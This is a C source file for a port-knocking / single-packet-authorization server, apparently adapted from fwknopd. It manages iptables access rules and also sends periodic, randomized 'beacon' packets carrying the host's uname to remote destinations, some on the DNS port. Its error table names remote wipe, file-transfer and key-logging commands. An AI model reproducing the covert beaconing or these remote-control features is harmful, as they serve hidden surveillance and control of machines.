/**
 * @file pkserver.c
 * @project invizible
 * @author Wesley Kenzie (wkenzie@gmail.com PGP 4c945266)
 * @created May 23, 2011
 * @based on fwknopd (Damien S. Stuart <dstuart@dstuart.org> and Michael Rash <mbr@cipherdyne.org>)
 * @modified June 19, 2011
 * @version 0.64
 * @copyright 2011. Arthur (Wesley) Kenzie. All Rights Reserved.
 * @license 3-clause BSD License. See accompanying LICENSE file.
 */

#include "parms.h"
#include "pkcommon.h"
#include "pkserver.h"
#include "mypcap.h"
#include <pwd.h>
#include <errno.h>
#include <unistd.h>
#ifdef __linux
#include <sys/inotify.h>
#endif

#if HAVE_SYS_SOCKET_H
  #include <sys/socket.h>
#endif
#if HAVE_ARPA_INET_H
  #include <arpa/inet.h>
#endif
#if HAVE_NETDB_H
  #include <netdb.h>
#endif

#include <fcntl.h>
#include <sys/select.h>

sig_atomic_t got_signal     = FALSE;    /* General signal flag (break capture) */
sig_atomic_t got_sighup     = FALSE;    /* SIGHUP flag  */
sig_atomic_t got_sigint     = FALSE;    /* SIGINT flag  */
sig_atomic_t got_sigterm    = FALSE;    /* SIGTERM flag */
sig_atomic_t got_sigusr1    = FALSE;    /* SIGUSR1 flag */
sig_atomic_t got_sigusr2    = FALSE;    /* SIGUSR2 flag */
sig_atomic_t got_sigchld    = FALSE;    /* SIGCHLD flag */
sig_atomic_t got_sigalrm    = FALSE;    /* SIGALRM flag */
sigset_t    *csmask;
//
/* SIGHUP Handler
*/
void
sig_handler_inviz(int sig) {
    int o_errno;
    got_signal = sig;
    char logmsg[512];
    //
    switch(sig) {
        case SIGHUP:
            got_sighup = TRUE;
            if (get_verbose()) {
                logit(_LOG_INFO, "SIGHUP signal caught", 0);
            }
            return;
        case SIGALRM:
            got_sigalrm = TRUE;
            if (get_verbose()) {
                logit(_LOG_INFO, "SIGALRM signal caught", 0);
            }
            if (get_usepk() && (get_mode() == INVIZ_MODE_LISTENER)) {
                //
                if (get_pkbeacon()) {
                    sigset_t sig, old_sig;
                    sigemptyset(&sig);
                    sigaddset(&sig, SIGINT);
                    sigaddset(&sig, SIGHUP);
                    sigaddset(&sig, SIGCHLD);
                    sigprocmask(SIG_BLOCK, &sig, &old_sig);
                    //
                    int ndx = 0;
                    int i, ii, iii;
                    int send_buffer[INVIZ_DEFAULT_PKBEACON_BUFFER_LEN+1];
                    int blen = INVIZ_MAX_PKBEACON_LEN;
                    char beaconmsg[blen+1];
                    memset(beaconmsg, 0x0, blen+1);
                    if (!get_pkbeaconmsg() || (strlen(get_pkbeaconmsg()) == 0)) {
                        strncpy(beaconmsg, INVIZ_DEFAULT_PKBEACON_MSG,
                                strlen(INVIZ_DEFAULT_PKBEACON_MSG));
                    } else {
                        strncpy(beaconmsg, get_pkbeaconmsg(), strlen((const char *)get_pkbeaconmsg()));
                    }
                    strncat(beaconmsg, ":", 1);
                    strncat(beaconmsg, INVIZ_VERSION, strlen(INVIZ_VERSION));
                    if (get_uname() && strlen(get_uname()) > 0) {
                        strncat(beaconmsg, ":", 1);
                        strncat(beaconmsg, get_uname(), strlen((const char *)get_uname()));
                    }
                    for (i=0; i < strlen(beaconmsg); i++) {
                        send_buffer[ndx++] = (int)beaconmsg[i];
                    }
                    send_buffer[ndx] = '\0';
                    //
                    struct sockaddr_in beacon_dest;
                    struct sockaddr_in beacon_src;
                    uint src_port, dest_port;
                    ii = resolve_addr((struct sockaddr*)&beacon_src, get_ifnameip());
                    if ((ii == EXIT_SUCCESS) && get_pkbeaconprivate()) {
                        iii = resolve_addr((struct sockaddr*)&beacon_dest, get_pkbeaconnextprivatedest());
                        if (iii == EXIT_SUCCESS) {
                            //
                            src_port = (((rand() % ((int)MAX_UNPRIVILEGED_PORT - (int)MAX_PRIVILEGED_PORT)) + (int)MAX_PRIVILEGED_PORT));
                            if (get_pkbeaconusetcp()) {
                                dest_port = get_pkbeacontcpdestport();
                            } else {
                                dest_port = get_pkbeaconudpdestport();
                            }
                            beacon_dest.sin_port = htons(dest_port);
                            beacon_src.sin_port = htons(src_port);
                            //
                            push_packet(FKO_BEACON_MSG, (int *)send_buffer, ndx, TRUE, &beacon_dest, &beacon_src);
                        }
                    }
                    if ((ii == EXIT_SUCCESS) && get_pkbeaconpublic()) {
                        iii = resolve_addr((struct sockaddr*)&beacon_dest, get_pkbeaconnextpublicdest());
                        if (iii == EXIT_SUCCESS) {
                            //
                            src_port = (((rand() % ((int)MAX_UNPRIVILEGED_PORT - (int)MAX_PRIVILEGED_PORT)) + (int)MAX_PRIVILEGED_PORT));
                            dest_port = (uint)INVIZ_DNS_PORT;
                            beacon_dest.sin_port = htons(dest_port);
                            beacon_src.sin_port = htons(src_port);
                            //
                            push_packet(FKO_BEACON_MSG, (int *)send_buffer, ndx, TRUE, &beacon_dest, &beacon_src);
                        }
                    }

                    //
                    // now unblock previous signals
                    //
                    sigprocmask(SIG_BLOCK, &old_sig, NULL);
                    //
                    int secs = ((rand() % (get_pkbeaconmaxinterval() - get_pkbeaconmininterval()) ) + get_pkbeaconmininterval());
                    alarm(secs); // reset alarm
                    if (get_verbose()) {
                        sprintf(logmsg, "port knocking beacon alarm reset to %d seconds",
                                secs);
                        logit(_LOG_INFO, logmsg, 0);
                    }
                }
            }
            return;
        case SIGINT:
            got_sigint = TRUE;
            sig_interrupted = TRUE;
            if (get_verbose()) {
                logit(_LOG_INFO, "SIGINT signal caught", 0);
            }
            return;
        case SIGTERM:
            got_sigterm = TRUE;
            sig_interrupted = TRUE;
            if (get_verbose()) {
                logit(_LOG_INFO, "SIGTERM signal caught", 0);
            }
            return;
        case SIGUSR1:
            got_sigusr1 = TRUE;
            sig_interrupted = TRUE;
            if (get_verbose()) {
                logit(_LOG_INFO, "SIGUSR1 signal caught", 0);
            }
            return;
        case SIGUSR2:
            got_sigusr2 = TRUE;
            sig_interrupted = TRUE;
            if (get_verbose()) {
                logit(_LOG_INFO, "SIGUSR2 signal caught", 0);
            }
            return;
        case SIGCHLD:
            o_errno = errno; /* Save errno */
            got_sigchld = TRUE;
            if (get_verbose()) {
                logit(_LOG_INFO, "SIGCHLD signal caught", 0);
            }
            waitpid(-1, NULL, WNOHANG);
            errno = o_errno; /* restore errno (in case reset by waitpid) */
            return;
    }
}
//
/* Setup signal handlers
*/
int
set_sig_handlers_inviz(void) {
    int                 err = 0;
    struct sigaction    act;
    char logmsg[512];
    //
    /* Clear the signal flags.
    */
    got_signal     = FALSE;
    got_sighup     = FALSE;
    got_sigint     = FALSE;
    got_sigterm    = FALSE;
    got_sigusr1    = FALSE;
    got_sigusr2    = FALSE;
    got_sigalrm    = FALSE;
    //
    /* Setup the handlers
    */
    act.sa_handler = sig_handler_inviz;
    sigemptyset(&act.sa_mask);
    act.sa_flags = SA_RESTART;

    if(sigaction(SIGHUP, &act, NULL) < 0) {
        sprintf(logmsg, "unable to set SIGHUP handler [%s]", strerror(errno));
        logit(_LOG_ERROR, logmsg, 0);
        err++;
    }

    if(sigaction(SIGALRM, &act, NULL) < 0) {
        sprintf(logmsg, "unable to set SIGALRM handler [%s]", strerror(errno));
        logit(_LOG_ERROR, logmsg, 0);
        err++;
    }

    if(sigaction(SIGINT, &act, NULL) < 0) {
        sprintf(logmsg, "unable to set SIGINT handler [%s]", strerror(errno));
        logit(_LOG_ERROR, logmsg, 0);
        err++;
    }

    if(sigaction(SIGTERM, &act, NULL) < 0) {
        sprintf(logmsg, "unable to set SIGTERM handler [%s]", strerror(errno));
        logit(_LOG_ERROR, logmsg, 0);
        err++;
    }

    if(sigaction(SIGUSR1, &act, NULL) < 0) {
        sprintf(logmsg, "unable to set SIGUSR1 handler [%s]", strerror(errno));
        logit(_LOG_ERROR, logmsg, 0);
        err++;
    }

    if(sigaction(SIGUSR2, &act, NULL) < 0) {
        sprintf(logmsg, "unable to set SIGUSR2 handler [%s]", strerror(errno));
        logit(_LOG_ERROR, logmsg, 0);
        err++;
    }

    if (get_setsignalchild()) {
        if(sigaction(SIGCHLD, &act, NULL) < 0) {
            sprintf(logmsg, "unable to set SIGCHLD handler [%s]", strerror(errno));
            logit(_LOG_ERROR, logmsg, 0);
            err++;
        }
    }

    return(err);
}
//
/* Generic hex dump function.
*/
void
hex_dump_inviz(unsigned char *data, int size) {
    int ln, i, j = 0;
    char ascii_str[17] = {0};

    for(i=0; i<size; i++) {
        if((i % 16) == 0) {
            printf(" %s\n  0x%.4x:  ", ascii_str, i);
            memset(ascii_str, 0x0, 17);
            j = 0;
        }

        printf("%.2x ", data[i]);

        ascii_str[j++] = (data[i] < 0x20 || data[i] > 0x7e) ? '.' : data[i];

        if(j == 8) {
            printf(" ");
        }
    }
    //
    /* Remainder...
    */
    ln = strlen(ascii_str);
    if(ln > 0) {
        for(i=0; i < 16-ln; i++) {
            printf("   ");
        }
        printf(" %s\n\n", ascii_str);
    }
}
//
/* Show the fields of the FKO context.
*/
char *
dump_ctx_inviz(fko_ctx_t ctx) {
    static char buf[CTX_DUMP_BUFSIZE];
    char       *ndx;
    int         cp;

    char       *rand_val        = NULL;
    char       *username        = NULL;
    char       *version         = NULL;
    char       *spa_message     = NULL;
    char       *nat_access      = NULL;
    char       *server_auth     = NULL;
    char       *enc_data        = NULL;
    char       *spa_digest      = NULL;
    char       *spa_data        = NULL;

    time_t      timestamp       = 0;
    //int         timestamp       = 0;
    short       msg_type        = -1;
    short       digest_type     = -1;
    int         client_timeout  = -1;

    /* Should be checking return values, but this is temp code. --DSS
    */
    fko_get_rand_value(ctx, &rand_val);
    fko_get_username(ctx, &username);
    fko_get_timestamp(ctx, &timestamp);
    fko_get_version(ctx, &version);
    fko_get_spa_message_type(ctx, &msg_type);
    fko_get_spa_message(ctx, &spa_message);
    fko_get_spa_nat_access(ctx, &nat_access);
    fko_get_spa_server_auth(ctx, &server_auth);
    fko_get_spa_client_timeout(ctx, &client_timeout);
    fko_get_spa_digest_type(ctx, &digest_type);
    fko_get_encoded_data(ctx, &enc_data);
    fko_get_spa_digest(ctx, &spa_digest);
    fko_get_spa_data(ctx, &spa_data);

    memset(buf, 0x0, CTX_DUMP_BUFSIZE);

    ndx = buf;

    cp = sprintf(ndx, "SPA Field Values:\n=================\n");
    ndx += cp;
    cp = sprintf(ndx, "   Random Value: %s\n", rand_val == NULL ? "<NULL>" : rand_val);
    ndx += cp;
    cp = sprintf(ndx, "       Username: %s\n", username == NULL ? "<NULL>" : username);
    ndx += cp;
    cp = sprintf(ndx, "      Timestamp: %u\n", (unsigned int) timestamp);
    ndx += cp;
    cp = sprintf(ndx, "    FKO Version: %s\n", version == NULL ? "<NULL>" : version);
    ndx += cp;
    cp = sprintf(ndx, "   Message Type: %i\n", msg_type);
    ndx += cp;
    cp = sprintf(ndx, " Message String: %s\n", spa_message == NULL ? "<NULL>" : spa_message);
    ndx += cp;
    cp = sprintf(ndx, "     Nat Access: %s\n", nat_access == NULL ? "<NULL>" : nat_access);
    ndx += cp;
    cp = sprintf(ndx, "    Server Auth: %s\n", server_auth == NULL ? "<NULL>" : server_auth);
    ndx += cp;
    cp = sprintf(ndx, " Client Timeout: %u\n", client_timeout);
    ndx += cp;
    cp = sprintf(ndx, "    Digest Type: %u\n", digest_type);
    ndx += cp;
    cp = sprintf(ndx, "   Encoded Data: %s\n", enc_data == NULL ? "<NULL>" : enc_data);
    ndx += cp;
    cp = sprintf(ndx, "SPA Data Digest: %s\n", spa_digest == NULL ? "<NULL>" : spa_digest);

    return(buf);
}
//
//
//
void
fw_config_init_inviz() {

    memset(&fwc, 0x0, sizeof(struct fw_config));
    char * astr;
    /* Set our firewall exe command path (iptables in most cases).
    */
    strlcpy(fwc.fw_command, (char *)get_firewallexe(), MAX_PATH_LEN);

    /* Pull the fwknop chain config info and setup our internal
     * config struct.  The IPT_INPUT is the only one that is
     * required. The rest are optional.
    */
    //set_fw_chain_conf_inviz(IPT_INPUT_ACCESS, CONF_IPT_INPUT_ACCESS);
    astr = get_firewallaccess(IPT_INPUT_ACCESS);
    if (!astr) {
        return;
    }
    set_fw_chain_conf_inviz(IPT_INPUT_ACCESS, astr);
    //
    /* The FWKNOP_OUTPUT_ACCESS requires ENABLE_IPT_OUTPUT_ACCESS be Y
    */
    if(get_fwallowoutput()) {
        astr = get_firewallaccess(IPT_OUTPUT_ACCESS);
        if (astr) {
            set_fw_chain_conf_inviz(IPT_OUTPUT_ACCESS, astr);
        }
    }

    /* The remaining access chains require ENABLE_IPT_FORWARDING = Y
    */
    if(get_fwallowforwarding()) {
        astr = get_firewallaccess(IPT_FORWARD_ACCESS);
        if (astr) {
            set_fw_chain_conf_inviz(IPT_FORWARD_ACCESS, astr);
        }
        astr = get_firewallaccess(IPT_DNAT_ACCESS);
        if (astr) {
            set_fw_chain_conf_inviz(IPT_DNAT_ACCESS, astr);
        }
        //
        /* SNAT (whichever mode) requires ENABLE_IPT_SNAT = Y
        */
        if(get_fwallowsnat()) {
            /* If an SNAT_TRANSLATE_IP is specified use the SNAT_ACCESS mode.
             * Otherwise, use MASQUERADE_ACCESS.
             *
             * XXX: --DSS: Not sure if using the TRANSLATE_IP parameter as
             *             the determining factor is the best why to handle
             *             this.
             *
            */
            if(get_fwsnatip() && (strlen(get_fwsnatip()) > 0)
              && strncasecmp(get_fwsnatip(), "__CHANGEME__", 10)!=0) {
                astr = get_firewallaccess(IPT_SNAT_ACCESS);
                if (astr) {
                    set_fw_chain_conf_inviz(IPT_SNAT_ACCESS, astr);
                }
            } else {
                astr = get_firewallaccess(IPT_MASQUERADE_ACCESS);
                if (astr) {
                    set_fw_chain_conf_inviz(IPT_MASQUERADE_ACCESS, astr);
                }
            }
        }
    }

    /* Let us find it via our opts struct as well.
    */
    set_firewallconfig(&fwc);

    return;
}
//
//
//
void
fw_initialize_inviz() {
    int res;
    char logmsg[512];

    /* Flush the chains (just in case) so we can start fresh.
    */
    delete_all_chains_inviz();

    /* Now create any configured chains.
    */
    res = create_fw_chains_inviz();

    if(res != 0) {
        sprintf(logmsg, "unable to create firewall chains [%s]", get_errstr(res));
        logit(_LOG_WARNING, logmsg, 0);
        exit(EXIT_FAILURE);
    }
}
//
//
//
int
fw_cleanup_inviz(void) {
    delete_all_chains_inviz();
    return(0);
}
//
/* Iterate over the configure firewall access chains and purge expired
 * firewall rules.
*/
void
check_firewall_rules_inviz() {
    char             exp_str[12];
    char             rule_num_str[6];
    char            *ndx, *rn_start, *rn_end, *tmp_mark;
    char            logmsg[512];

    int             i, res, rn_offset;
    time_t          now, rule_exp, min_exp = 0;

    struct fw_config *fwconfig = (struct fw_config *)get_firewallconfig();
    struct fw_chain *fwchain = fwconfig->chain;

    time(&now);

    /* Iterate over each chain and look for active rules to delete.
    */
    for(i = 0; i < FW_NUM_CHAIN_FIELDS; i++) {
        /* Just in case we somehow lose track and fall out-of-whack,
         * we be the hero and reset it to zero.
         *  (poet but don't know it :-o )
        */
        if(fwchain[i].active_rules < 0) {
            fwchain[i].active_rules = 0;
        }

        /* If there are no active rules or we have not yet
         * reached our expected next expire time, continue.
        */
        if(fwchain[i].active_rules == 0 || fwchain[i].next_expire > now) {
            continue;
        }

        zero_cmd_buffers_inviz();

        rn_offset = 0;

        /* There should be a rule to delete.  Get the current list of
         * rules for this chain and delete the ones that are expired.
        */
        snprintf(cmd_buf, CMD_BUFSIZE-1, "%s " IPT_LIST_RULES_ARGS,
            fwconfig->fw_command,
            fwchain[i].table,
            fwchain[i].to_chain
        );

        res = run_extcmd_inviz(0, cmd_buf, cmd_out, STANDARD_CMD_OUT_BUFSIZE, 0);

        if(!EXTCMD_IS_SUCCESS(res)) {
            sprintf(logmsg, "Error %i from cmd:'%s': %s", res, cmd_buf, cmd_out);
            logit(_LOG_ERROR, logmsg, 0);
            continue;
        }

        if(get_verbose() > 2) {
            sprintf(logmsg, "RES=%i, CMD_BUF: %s\nRULES LIST: %s", res, cmd_buf, cmd_out);
            logit(_LOG_INFO, logmsg, 0);
        }

        ndx = strstr(cmd_out, "_exp_");
        if(ndx == NULL) {
            /* we did not find an expected rule.
            */
            sprintf(logmsg, "Did not find expire comment in rules list %i", i);
            logit(_LOG_ERROR, logmsg, 0);

            fwchain[i].active_rules--;
            continue;
        }

        /* walk the list and process rules as needed.
        */
        while (ndx != NULL) {
            /* Jump forward and extract the timestamp
            */
            ndx +=5;

            /* remember this spot for when we look for the next
             * rule.
            */
            tmp_mark = ndx;

            strlcpy(exp_str, ndx, 11);
            rule_exp = (time_t)atoll(exp_str);

//fprintf(stderr, "RULE_EXP=%u, NOW=%u\n", rule_exp, now);
            if(rule_exp <= now) {
                /* Backtrack and get the rule number and delete it.
                */
                rn_start = ndx;
                while(--rn_start > cmd_out) {
                    if(*rn_start == '\n')
                        break;
                }

                if(*rn_start != '\n') {
                    /* This should not happen. But if it does, complain,
                     * decrement the active rule value, and go on.
                    */
                    sprintf(logmsg, "Rule parse error while finding rule line start in chain %i", i);
                    logit(_LOG_ERROR, logmsg, 0);

                    fwchain[i].active_rules--;
                    break;
                }
                rn_start++;

                rn_end = strchr(rn_start, ' ');
                if(rn_end == NULL) {
                    /* This should not happen. But if it does, complain,
                     * decrement the active rule value, and go on.
                    */
                    sprintf(logmsg, "Rule parse error while finding rule number in chain %i", i);
                    logit(_LOG_ERROR, logmsg, 0);

                    fwchain[i].active_rules--;
                    break;
                }

                strlcpy(rule_num_str, rn_start, (rn_end - rn_start)+1);

                zero_cmd_buffers_inviz();

                snprintf(cmd_buf, CMD_BUFSIZE-1, "%s " IPT_DEL_RULE_ARGS,
                    fwconfig->fw_command,
                    fwchain[i].table,
                    fwchain[i].to_chain,
                    atoi(rule_num_str) - rn_offset
                );


//fprintf(stderr, "DELETE RULE CMD: %s\n", cmd_buf);
                res = run_extcmd_inviz(0, cmd_buf, err_buf, CMD_BUFSIZE, 0);
                if(EXTCMD_IS_SUCCESS(res)) {
                    sprintf(logmsg, "Removed rule %s from %s with expire time of %u.",
                        rule_num_str, fwchain[i].to_chain, (unsigned int)rule_exp
                    );
                    logit(_LOG_INFO, logmsg, 0);

                    rn_offset++;
                    fwchain[i].active_rules--;
                } else {
                    sprintf(logmsg, "Error %i from cmd:'%s': %s", res, cmd_buf, err_buf);
                    logit(_LOG_ERROR, logmsg, 0);
                }

            } else {
                /* Track the minimum future rule expire time.
                */
                if(rule_exp > now) {
                    min_exp = (min_exp < rule_exp) ? min_exp : rule_exp;
                }
            }

            /* Push our tracking index forward beyond (just processed) _exp_
             * string so we can continue to the next rule in the list.
            */
            ndx = strstr(tmp_mark, "_exp_");
        }

        /* Set the next pending expire time accordingly. 0 if there are no
         * more rules, or whatever the next expected (min_exp) time will be.
        */
        if(fwchain[i].active_rules < 1) {
            fwchain[i].next_expire = 0;
        } else if(min_exp) {
            fwchain[i].next_expire = min_exp;
        }
    }
}
//
/* Rule Processing - Create an access request...
*/
int
process_spa_request_inviz(struct spa_data * spadat) {
    char             nat_ip[16] = {0};
    char             snat_target[SNAT_TARGET_BUFSIZE] = {0};
    char            *ndx;
    char            logmsg[512];

    unsigned int     nat_port = 0;;

    acc_port_list_t *port_list = NULL;
    acc_port_list_t *ple;

    unsigned int    fst_proto;
    unsigned int    fst_port;

    struct fw_config *fwconfig = (struct fw_config *)get_firewallconfig();
    struct fw_chain *in_chain   = &(fwconfig->chain[IPT_INPUT_ACCESS]);
    struct fw_chain *out_chain  = &(fwconfig->chain[IPT_OUTPUT_ACCESS]);
    struct fw_chain *fwd_chain  = &(fwconfig->chain[IPT_FORWARD_ACCESS]);
    struct fw_chain *dnat_chain = &(fwconfig->chain[IPT_DNAT_ACCESS]);
    struct fw_chain *snat_chain; /* We assign this later (if we need to). */

    int             res = 0;
    time_t          now;
    unsigned int    exp_ts;

    /* Parse and expand our access message.
    */
    expand_acc_port_list_inviz(&port_list, spadat->spa_message_remain);

    /* Start at the top of the proto-port list...
    */
    ple = port_list;

    /* Remember the first proto/port combo in case we need them
     * for NAT access requests.
    */
    fst_proto = ple->proto;
    fst_port  = ple->port;

    /* Set our expire time value.
    */
    time(&now);
    exp_ts = (now + spadat->fw_access_timeout);

    /* For straight access requests, we currently support multiple proto/port
     * request.
    */
    if(spadat->message_type == FKO_ACCESS_MSG
      || spadat->message_type == FKO_CLIENT_TIMEOUT_ACCESS_MSG) {
        /* Create an access command for each proto/port for the source ip.
        */
        while(ple != NULL) {
            zero_cmd_buffers_inviz();

            snprintf(cmd_buf, CMD_BUFSIZE-1, "%s " IPT_ADD_RULE_ARGS,
                fwconfig->fw_command,
                in_chain->table,
                in_chain->to_chain,
                ple->proto,
                spadat->use_src_ip,
                ple->port,
                exp_ts,
                in_chain->target
            );

//--DSS tmp
//fprintf(stderr, "ADD CMD: %s\n", cmd_buf);
            res = run_extcmd_inviz(0, cmd_buf, err_buf, CMD_BUFSIZE, 0);
            if(EXTCMD_IS_SUCCESS(res)) {
                sprintf(logmsg, "Added Rule to %s for %s, %s expires at %u",
                    in_chain->to_chain, spadat->use_src_ip,
                    spadat->spa_message_remain, exp_ts
                );
                logit(_LOG_INFO, logmsg, 0);

                in_chain->active_rules++;

                /* Reset the next expected expire time for this chain if it
                * is warranted.
                */
                if(in_chain->next_expire < now || exp_ts < in_chain->next_expire) {
                    in_chain->next_expire = exp_ts;
                }
            } else {
                sprintf(logmsg, "Error %i from cmd:'%s': %s", res, cmd_buf, err_buf);
                logit(_LOG_ERROR, logmsg, 0);
            }

            /* If we have to make an corresponding OUTPUT rule if out_chain target
            * is not NULL.
            */
            if(out_chain->to_chain != NULL && strlen(out_chain->to_chain)) {
                zero_cmd_buffers_inviz();

                snprintf(cmd_buf, CMD_BUFSIZE-1, "%s " IPT_ADD_OUT_RULE_ARGS,
                    fwconfig->fw_command,
                    out_chain->table,
                    out_chain->to_chain,
                    ple->proto,
                    spadat->use_src_ip,
                    ple->port,
                    exp_ts,
                    out_chain->target
                );

//--DSS tmp
//fprintf(stderr, "ADD OUTPUT CMD: %s\n", cmd_buf);
                res = run_extcmd_inviz(0, cmd_buf, err_buf, CMD_BUFSIZE, 0);
                if(EXTCMD_IS_SUCCESS(res)) {
                    sprintf(logmsg, "Added OUTPUT Rule to %s for %s, %s expires at %u",
                        out_chain->to_chain, spadat->use_src_ip,
                        spadat->spa_message_remain, exp_ts
                    );
                    logit(_LOG_INFO, logmsg, 0);

                    out_chain->active_rules++;

                    /* Reset the next expected expire time for this chain if it
                    * is warranted.
                    */
                    if(out_chain->next_expire < now || exp_ts < out_chain->next_expire) {
                        out_chain->next_expire = exp_ts;
                    }
                } else {
                    sprintf(logmsg, "Error %i from cmd:'%s': %s", res, cmd_buf, err_buf);
                    logit(_LOG_ERROR, logmsg, 0);
                }

            }

            ple = ple->next;
        }

        /* Done with the port list for access rules.
        */
        free_acc_port_list_inviz(port_list);

    } else if(  spadat->message_type == FKO_LOCAL_NAT_ACCESS_MSG
      || spadat->message_type == FKO_CLIENT_TIMEOUT_LOCAL_NAT_ACCESS_MSG
      || spadat->message_type == FKO_NAT_ACCESS_MSG
      || spadat->message_type == FKO_CLIENT_TIMEOUT_NAT_ACCESS_MSG  ) {
        //
        // NAT requests
        //
        /* Parse out the NAT IP and Port components.
        */
        ndx = strchr(spadat->nat_access, ',');
        if(ndx != NULL) {
            strlcpy(nat_ip, spadat->nat_access, (ndx-spadat->nat_access)+1);
            nat_port = atoi(ndx+1);
        }

// --DSS temp
//fprintf(stderr, "NAT IP: '%s', NAT PORT: '%i'\n", nat_ip, nat_port);

        /* Make our FORWARD and NAT rules
        */
        if(fwd_chain->to_chain != NULL && strlen(fwd_chain->to_chain)) {
            zero_cmd_buffers_inviz();

            snprintf(cmd_buf, CMD_BUFSIZE-1, "%s " IPT_ADD_FWD_RULE_ARGS,
                fwconfig->fw_command,
                fwd_chain->table,
                fwd_chain->to_chain,
                fst_proto,
                spadat->use_src_ip,
                nat_ip,
                nat_port,
                exp_ts,
                fwd_chain->target
            );

//--DSS tmp
//fprintf(stderr, "ADD OUTPUT CMD: %s\n", cmd_buf);
            res = run_extcmd_inviz(0, cmd_buf, err_buf, CMD_BUFSIZE, 0);
            if(EXTCMD_IS_SUCCESS(res)) {
                sprintf(logmsg, "Added FORWARD Rule to %s for %s, %s expires at %u",
                    fwd_chain->to_chain, spadat->use_src_ip,
                    spadat->spa_message_remain, exp_ts
                );
                logit(_LOG_INFO, logmsg, 0);

                fwd_chain->active_rules++;

                /* Reset the next expected expire time for this chain if it
                * is warranted.
                */
                if(fwd_chain->next_expire < now || exp_ts < fwd_chain->next_expire) {
                    fwd_chain->next_expire = exp_ts;
                }
            } else {
                sprintf(logmsg, "Error %i from cmd:'%s': %s", res, cmd_buf, err_buf);
                logit(_LOG_ERROR, logmsg, 0);
            }
        }

        if(dnat_chain->to_chain != NULL && strlen(dnat_chain->to_chain)) {
            zero_cmd_buffers_inviz();

            snprintf(cmd_buf, CMD_BUFSIZE-1, "%s " IPT_ADD_DNAT_RULE_ARGS,
                fwconfig->fw_command,
                dnat_chain->table,
                dnat_chain->to_chain,
                fst_proto,
                spadat->use_src_ip,
                fst_port,
                exp_ts,
                dnat_chain->target,
                nat_ip,
                nat_port
            );

//--DSS tmp
//fprintf(stderr, "ADD DNAT CMD: %s\n", cmd_buf);
            res = run_extcmd_inviz(0, cmd_buf, err_buf, CMD_BUFSIZE, 0);
            if(EXTCMD_IS_SUCCESS(res)) {
                sprintf(logmsg, "Added DNAT Rule to %s for %s, %s expires at %u",
                    dnat_chain->to_chain, spadat->use_src_ip,
                    spadat->spa_message_remain, exp_ts
                );
                logit(_LOG_INFO, logmsg, 0);

                dnat_chain->active_rules++;

                /* Reset the next expected expire time for this chain if it
                * is warranted.
                */
                if(dnat_chain->next_expire < now || exp_ts < dnat_chain->next_expire) {
                    dnat_chain->next_expire = exp_ts;
                }
            } else {
                sprintf(logmsg, "Error %i from cmd:'%s': %s", res, cmd_buf, err_buf);
                logit(_LOG_ERROR, logmsg, 0);
            }
        }

        /* If SNAT (or MASQUERADE) is wanted, then we add those rules here as well.
        */
        if(get_fwallowsnat()) {
            zero_cmd_buffers_inviz();

            /* Setup some parameter depending on whether we are using SNAT
             * or MASQUERADE.
            */
            if(get_fwsnatip() && strncasecmp((char *)get_fwsnatip(), "__CHANGEME__", 10)!=0) {
                /* Using static SNAT */
                snat_chain = &(fwconfig->chain[IPT_SNAT_ACCESS]);
                snprintf(snat_target, SNAT_TARGET_BUFSIZE-1,
                    "--to-source %s:%i", (char *)get_fwsnatip(), fst_port);
            } else {
                /* Using MASQUERADE */
                snat_chain = &(fwconfig->chain[IPT_MASQUERADE_ACCESS]);
                snprintf(snat_target, SNAT_TARGET_BUFSIZE-1,
                    "--to-ports %i", fst_port);
            }

            snprintf(cmd_buf, CMD_BUFSIZE-1, "%s " IPT_ADD_SNAT_RULE_ARGS,
                fwconfig->fw_command,
                snat_chain->table,
                snat_chain->to_chain,
                fst_proto,
                nat_ip,
                nat_port,
                exp_ts,
                snat_chain->target,
                snat_target
            );

            res = run_extcmd_inviz(0, cmd_buf, err_buf, CMD_BUFSIZE, 0);
            if(EXTCMD_IS_SUCCESS(res)) {
                sprintf(logmsg, "Added Source NAT Rule to %s for %s, %s expires at %u",
                    snat_chain->to_chain, spadat->use_src_ip,
                    spadat->spa_message_remain, exp_ts
                );
                logit(_LOG_INFO, logmsg, 0);

                snat_chain->active_rules++;

                /* Reset the next expected expire time for this chain if it
                * is warranted.
                */
                if(snat_chain->next_expire < now || exp_ts < snat_chain->next_expire) {
                    snat_chain->next_expire = exp_ts;
                }
            } else {
                sprintf(logmsg, "Error %i from cmd:'%s': %s", res, cmd_buf, err_buf);
                logit(_LOG_ERROR, logmsg, 0);
            }
        }
    }

    return(res);
}
//
/* Attempt to determine the error code type and send the appropriate
 * response. Basically assume it is a libfko error if it is not an fwknopd
 * error code.
*/
const char*
get_errstr(int err_code) {
    if(! IS_FWKNOPD_ERROR(err_code))
        return(fko_errstr(err_code));

    return(fwknopd_errstr(err_code));
}
//
/* Return a string describing the meaning of the given error code.
*/
const char*
fwknopd_errstr(int err_code) {
    switch (err_code)
    {
        case 0:
            return("Success");

        case SPA_MSG_BAD_DATA:
            return("Data is not a valid SPA message format");

        case SPA_MSG_LEN_TOO_SMALL:
            return("Not enough data to be a valid SPA message");

        case SPA_MSG_NOT_SPA_DATA:
            return("Data is not a SPA message");

        case SPA_MSG_HTTP_NOT_ENABLED:
            return("SPA via HTTP request, but ENABLE_SPA_OVER_HTTP is not set");

        case SPA_MSG_FKO_CTX_ERROR:
            return("Error creating FKO context for incoming data.");

        case SPA_MSG_DIGEST_ERROR:
            return("Unable to retrieve digest in from the SPA data.");

        case SPA_MSG_DIGEST_CACHE_ERROR:
            return("Error trying to access the digest.cache file");

        case SPA_MSG_REPLAY:
            return("Detected SPA message replay");

        case SPA_MSG_TOO_OLD:
            return("SPA message timestamp is outside the allowable window");

        case SPA_MSG_ACCESS_DENIED:
            return("SPA message did not pass access checks");

        case SPA_MSG_COMMAND_ERROR:
            return("An error occurred while executing port knocking command message");

        case SPA_MSG_INOTIFY_ERROR:
            return("error encountered when executing inotify message");

        case SPA_MSG_BEACON_ERROR:
            return("error encountered when executing beacon message");

        case SPA_MSG_WIPE_ERROR:
            return("error encountered when executing SPA wipe message");

        case SPA_MSG_TRANSFER_ERROR:
            return("error encountered when executing SPA file transfer message");

        case SPA_MSG_KEYLOG_ERROR:
            return("error encountered when executing SPA key logging message");

        case SPA_MSG_PASS_ERROR:
            return("error encountered when executing SPA password message");

        case SPA_MSG_NOT_SUPPORTED:
            return("Unsupported SPA message operation");

        case SPA_MSG_ERROR:
            return("General SPA message processing error");

        case FW_RULE_ADD_ERROR:
            return("An error occurred while tring to add a firewall rule");

        case FW_RULE_DELETE_ERROR:
            return("An error occurred while tring to delete a firewall rule");

